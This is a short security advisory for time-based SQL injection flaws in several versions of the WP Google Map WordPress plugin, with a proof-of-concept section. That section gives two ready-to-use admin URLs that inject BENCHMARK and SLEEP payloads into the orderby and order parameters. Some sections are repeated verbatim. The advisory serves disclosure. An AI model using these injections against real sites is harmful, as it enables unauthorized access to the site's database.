WordPress Google Map Plugin Multiple SQL injection Vulnerabilities
BID:104962
Info
WordPress Google Map Plugin Multiple SQL injection Vulnerabilities
| Bugtraq ID: | 104962 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 12 2018 12:00AM |
| Updated: | Jun 12 2018 12:00AM |
| Credit: | Neven Biruski |
| Vulnerable: |
WordPress WP Google Map 4.0.4 WordPress WP Google Map 4.0 WordPress WP Google Map 3.12 WordPress WP Google Map 3.0 WordPress WP Google Map 2.1 |
| Not Vulnerable: | |
Exploit / POC
WordPress Google Map Plugin Multiple SQL injection Vulnerabilities
The following URLs are available:
http://example.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=ascPROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
http://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
The following URLs are available:
http://example.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=ascPROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
http://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
Solution / Fix
WordPress Google Map Plugin Multiple SQL injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]